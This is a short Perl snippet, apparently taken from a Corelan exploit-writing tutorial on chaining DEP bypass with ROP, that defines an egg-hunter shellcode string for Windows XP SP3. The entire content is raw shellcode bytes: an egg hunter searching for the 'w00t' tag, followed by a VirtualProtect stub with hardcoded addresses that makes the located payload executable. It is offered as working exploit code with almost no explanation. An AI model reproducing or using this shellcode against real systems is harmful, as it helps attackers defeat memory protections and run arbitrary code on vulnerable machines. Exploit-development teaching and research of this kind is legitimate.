https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/ #------------------------------------------------------------------- #corelanc0d3r - egg hunter which will mark shellcode loc executable #size to mark as executable : 300 bytes #writeable location : 10035005 #XP SP3 #------------------------------------------------------------------- my $egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02". "\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8". "\x77\x30\x30\x74". # w00t "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF". #no more jmp edi at the end #VirtualProtect "\x68\x05\x50\x03\x10\x31\xc0\x04". "\x40\x50\x05\xbf\xff\xff\x7f\x2d". "\xff\xfc\xff\x7f\x50\x57\x57\x68". "\xd4\x1a\x80\x7c\xc3";